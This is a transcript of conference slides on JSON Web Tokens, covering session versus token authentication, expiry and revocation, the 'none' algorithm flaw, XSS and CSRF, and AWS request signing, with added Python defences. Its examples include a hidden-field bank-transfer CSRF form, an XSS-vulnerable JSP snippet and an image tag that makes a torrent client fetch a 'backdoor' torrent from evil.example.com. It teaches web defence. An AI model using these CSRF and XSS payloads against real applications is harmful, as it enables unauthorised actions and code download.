JSON Web Tokens

May 04, 2023

Transcript
Page 1: JSON Web Tokens

JSON Web Tokens
Luc Engelen

Page 2: JSON Web Tokens

Myself

2006 ‑ 2014: Researcher at TU/e

2014 ‑ 2016: iOS and Java developer at ISAAC

2016 ‑ present: (Mostly) Java developer at Kabisa

Page 3: JSON Web Tokens

Kabisa

Web apps ‑ Hybrid mobile apps

Ruby on Rails ‑ Java ‑ Elixir

Backbone ‑ Marionette ‑ React

Agile ‑ TDD ‑ BDD

Weert ‑ Amsterdam

Page 4: JSON Web Tokens

What's the problem?

Page 5: JSON Web Tokens

Architecture diagram: your device, nginx, three Spring instances, Postgres

Page 6: JSON Web Tokens

Sequence diagram, session-based authentication:

Client -> Server: username and password
Server: start session
Server -> Client: sessionToken
Client -> Server: request with sessionToken
Server -> Client: response
Client -> Server: request with sessionToken
Server -> Client: response
Client -> Server: request with sessionToken
Server -> Client: error

Page 7: JSON Web Tokens

eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjE0NzYyOTAxNDksInN1YiI6IjEifQ.mvJEWu3kxm0WSUKu-qEVTBmuelM-2Te-VJHEFclVt_uR89ya0hNawkrgftQbAd-28lycLX2jXCgOGrA3XRg9Jg

Page 8: JSON Web Tokens

Header:
{ "alg": "HS512" }

Payload:
{ "sub": "1", "admin": false }

Signature:
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret )

Page 9: JSON Web Tokens

Sequence diagram, JWT-based authentication:

Client -> Server: username and password
Server: construct JWT
Server -> Client: JWT
Client -> Server: request with JWT
Server: check JWT
Server -> Client: response
Client -> Server: request with JWT
Server: check JWT
Server -> Client: response

Page 10: JSON Web Tokens

Where to leave these tokens?

In a cookie?

In a header?

Page 11: JSON Web Tokens

Intermezzo: XSS and CSRF

XSS

Someone is able to have their scripts executed as part of your web application.

<% String eid = request.getParameter("eid"); %>
...
Employee ID: <%= eid %>

Page 12: JSON Web Tokens

Intermezzo: XSS and CSRF

CSRF

Someone else's web application secretly lets its visitors perform actions with your web application, due to cookies still present from previous visits.

<form action="http://bank.com/transfer.do" method="POST">
  <input type="hidden" name="acct" value="MARIA"/>
  <input type="hidden" name="amount" value="100000"/>
  <input type="submit" value="View my pictures"/>
</form>

Page 13: JSON Web Tokens

Intermezzo: XSS and CSRF

print "<html>"
print "Latest comment:"
print database.latestComment
print "</html>"
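The pseudocode above pastes whatever is stored in the database straight into the page. As an added example that is not from the slides, the Python below renders the same page twice: once as the slide does it, and once with the untrusted value encoded for an HTML text context. The sample comment is constructed for the example; the same fix applies to the JSP snippet on page 11 (encode `eid` before writing it out).

```python
import html


def render_latest_comment_unsafe(latest_comment: str) -> str:
    """The slide's pseudocode, line for line: the stored comment is concatenated into the page."""
    return "<html>" + "Latest comment:" + latest_comment + "</html>"


def render_latest_comment_safe(latest_comment: str) -> str:
    """Same page, but the untrusted value is encoded for an HTML text context before output.
    Browsers then show the markup as text instead of executing it."""
    return "<html>" + "Latest comment:" + html.escape(latest_comment, quote=True) + "</html>"


# Constructed sample: a "comment" that contains markup instead of plain text.
SAMPLE_COMMENT = '<script>alert("xss")</script>'

if __name__ == "__main__":
    print(render_latest_comment_unsafe(SAMPLE_COMMENT))
    print(render_latest_comment_safe(SAMPLE_COMMENT))
```

Encoding belongs at the point of output and has to match the context (HTML text here; attribute values, JavaScript strings and URLs each need their own encoder), which is why template engines that escape by default are the durable fix rather than ad-hoc filtering of input.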

Page 14: JSON Web Tokens

Intermezzo: XSS and CSRF

<img src="http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent">

Page 15: JSON Web Tokens

Where to leave these tokens?

In a cookie?

In a header?

Page 16: JSON Web Tokens

Defence against CSRF is straightforward and durable

1. Check the origin and referer headers

2. Check for some other header you're setting, such as X-Requested-With

See www.owasp.org
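The two checks above, as an added example that is not from the slides or the speaker's code, written in Python over plain header dictionaries so it can be run against the login request shown on page 23 and against the kind of cross-site form post and image request shown on pages 12 and 14. The allowed origin and the sample requests are constructed for the example.

```python
from typing import Dict, Tuple
from urllib.parse import urlsplit

# Constructed: the origin our own pages are served from (taken from the page 23 request).
ALLOWED_ORIGINS = {"http://54.194.126.161"}
# Methods that must never change state; the checks below only apply to the others.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def origin_of(url: str) -> str:
    """Reduce an Origin or Referer value to scheme://host[:port]."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def csrf_check(method: str, headers: Dict[str, str]) -> Tuple[bool, str]:
    """Apply the slide's two checks to one request; returns (accepted, reason)."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method, no state change expected"
    h = {k.lower(): v for k, v in headers.items()}
    # 1. Origin (falling back to Referer) must be one of our own origins.
    #    A form or <img> on another site makes the browser send that site's origin,
    #    and a request with neither header is treated as cross-site.
    source = h.get("origin") or h.get("referer")
    if source is None:
        return False, "no Origin or Referer header"
    if origin_of(source) not in ALLOWED_ORIGINS:
        return False, f"cross-site request from {origin_of(source)}"
    # 2. A custom header our own JavaScript sets: a plain HTML form cannot add it,
    #    and a cross-origin script can only add it after a CORS preflight we do not grant.
    if h.get("x-requested-with") != "XMLHttpRequest":
        return False, "missing X-Requested-With"
    return True, "ok"


# Constructed sample requests: the slide's login call, a cross-site form post, an <img> fetch.
SAMPLES = {
    "login": ("POST", {"Origin": "http://54.194.126.161",
                       "Referer": "http://54.194.126.161/login",
                       "X-Requested-With": "XMLHttpRequest"}),
    "form": ("POST", {"Origin": "http://evil.example.com",
                      "Referer": "http://evil.example.com/pictures.html"}),
    "img": ("GET", {"Referer": "http://evil.example.com/"}),
}


def run_samples() -> Dict[str, Tuple[bool, str]]:
    return {name: csrf_check(method, headers) for name, (method, headers) in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name}: {verdict}")
```

Two caveats the slide leaves implicit: the GET-based image request on page 14 passes because GET is exempt, so this defence only holds if GET handlers never change state; and Referer is stripped by some privacy settings, which is why Origin is consulted first and a request carrying neither header is refused rather than waved through.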

Page 17: JSON Web Tokens

What happens when I change my password?

Header:
{ "alg": "HS512" }

Payload:
{ "sub": "1", "admin": false }

Signature:
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret )

Page 18: JSON Web Tokens

When should a JWT expire?

As soon as possible, to prevent misuse for long periods

As late as possible, so that users don't have to re-authenticate all the time

Page 19: JSON Web Tokens

When should a JWT expire?

Introduce a short-lived token used for authentication per request

Introduce a long-lived token used to generate a new short-lived token when needed

The long-lived token is used in combination with a blacklist of retracted tokens

Page 20: JSON Web Tokens

Should I accept all "valid" JWTs?

No, because "none" is a valid algorithm

The key you use to check the signature should match the algorithm

See https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
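The slides give the signature formula and the advice but no code. As an added example that is not from the talk or the speaker's repository, the Python below (standard library only) builds and checks tokens the way pages 8 and 9 describe, decodes the token shown on page 7, and implements the advice of pages 19 and 20: a short-lived access token, a long-lived refresh token checked against a blacklist of retracted ids (which is what the password-change and account-deletion questions on pages 17 and 21 come down to), and an algorithm check driven by server configuration rather than by the token header, so "none" is never accepted. The secret, the TTLs and the claim names `jti` and `use` are constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict, Optional, Tuple

# The token from page 7, with its base64url '-' characters restored.
SLIDE_TOKEN = ("eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjE0NzYyOTAxNDksInN1YiI6IjEifQ."
               "mvJEWu3kxm0WSUKu-qEVTBmuelM-2Te-VJHEFclVt_uR89ya0hNawkrgftQbAd-28lycLX2jXCgOGrA3XRg9Jg")

SECRET = b"demo-secret-not-for-production"   # constructed; a real server loads it from configuration
ALGORITHMS = {"HS256": hashlib.sha256, "HS512": hashlib.sha512}   # "none" is deliberately absent
ACCESS_TTL = 5 * 60              # short-lived token, sent with every request
REFRESH_TTL = 30 * 24 * 3600     # long-lived token, only used to mint access tokens
revoked_refresh_ids = set()      # the slide's blacklist of retracted tokens (by jti)


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode(payload: Dict, secret: bytes, alg: str = "HS512") -> str:
    """header.payload.signature, with the HMAC computed over the two encoded parts as on page 8."""
    header = b64url_encode(json.dumps({"alg": alg}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}"
    sig = hmac.new(secret, signing_input.encode("ascii"), ALGORITHMS[alg]).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def decode_unverified(token: str) -> Tuple[Dict, Dict]:
    """Header and payload only; nothing here may be trusted until verify() has run."""
    header, body, _ = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(body))


def verify(token: str, secret: bytes, expected_alg: str, now: Optional[float] = None) -> Dict:
    """Return the claims if signature and expiry check out, else raise ValueError.
    The algorithm comes from server configuration, not from the token header, so a header
    claiming "none" (or another variant) is rejected before the key is used at all."""
    parts = token.split(".")
    if len(parts) != 3 or expected_alg not in ALGORITHMS:
        raise ValueError("malformed token or unsupported algorithm")
    header, body, sig = parts
    header_obj = json.loads(b64url_decode(header))
    if not isinstance(header_obj, dict) or header_obj.get("alg") != expected_alg:
        raise ValueError("unexpected alg")
    expected = hmac.new(secret, f"{header}.{body}".encode("ascii"), ALGORITHMS[expected_alg]).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(body))
    if "exp" in claims and (now if now is not None else time.time()) >= claims["exp"]:
        raise ValueError("expired")
    return claims


def is_valid(token: str, now: float) -> bool:
    try:
        verify(token, SECRET, "HS512", now)
        return True
    except ValueError:
        return False


def issue_pair(sub: str, now: float) -> Tuple[str, str]:
    """Login: a short-lived access token plus a long-lived refresh token with its own id."""
    access = encode({"sub": sub, "exp": int(now + ACCESS_TTL)}, SECRET)
    refresh = encode({"sub": sub, "jti": secrets.token_hex(8), "use": "refresh",
                      "exp": int(now + REFRESH_TTL)}, SECRET)
    return access, refresh


def refresh_access(refresh_token: str, now: float) -> str:
    """Mint a new access token, unless the refresh token was retracted or has expired."""
    claims = verify(refresh_token, SECRET, "HS512", now)
    if claims.get("use") != "refresh" or claims.get("jti") in revoked_refresh_ids:
        raise ValueError("refresh token not accepted")
    return encode({"sub": claims["sub"], "exp": int(now + ACCESS_TTL)}, SECRET)


def revoke(refresh_token: str) -> None:
    """Password change or account deletion: blacklist the refresh token's id. The access
    token already issued cannot be recalled; it simply ages out after ACCESS_TTL."""
    _, claims = decode_unverified(refresh_token)
    revoked_refresh_ids.add(claims["jti"])


if __name__ == "__main__":
    print(decode_unverified(SLIDE_TOKEN))
    access, refresh = issue_pair("1", time.time())
    print(is_valid(access, time.time()), refresh_access(refresh, time.time())[:20] + "...")
```

The blacklist is the one piece of server-side state that remains, which is the trade-off the slide describes: the server stays stateless per request (only the access token is checked), and the lookup is paid only when a refresh happens. The window in which a retracted account can still act is bounded by ACCESS_TTL, so that value is a security setting, not just a convenience one.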

Page 21: JSON Web Tokens

What happens when I delete my account?

Header:
{ "alg": "HS512" }

Payload:
{ "sub": "1", "admin": false }

Signature:
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret )

Page 22: JSON Web Tokens

How do I apply this idea to server‑to‑server communication?

Page 23: JSON Web Tokens

POST /api/session HTTP/1.1
Host: 54.194.126.161
Connection: keep-alive
Content-Length: 31
Accept: */*
Origin: http://54.194.126.161
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/json
Referer: http://54.194.126.161/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Cookie: JSESSIONID=37AA2A85693E255315D532C845FDE47B

{"username":"a","password":"a"}

Page 24: JSON Web Tokens

http://docs.aws.amazon.com/AmazonS3/latest/API/sig-v4-header-based-auth.html

Page 25: JSON Web Tokens
Page 26: JSON Web Tokens
Page 27: JSON Web Tokens

Request:

GET ?lifecycle HTTP/1.1
Host: examplebucket.s3.amazonaws.com
Authorization: SignatureToBeCalculated
x-amz-date: 20130524T000000Z
x-amz-content-sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Canonical request:

GET
/
lifecycle=
host:examplebucket.s3.amazonaws.com
x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
x-amz-date:20130524T000000Z

host;x-amz-content-sha256;x-amz-date
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Page 28: JSON Web Tokens

See for yourself

https://github.com/ljpengelen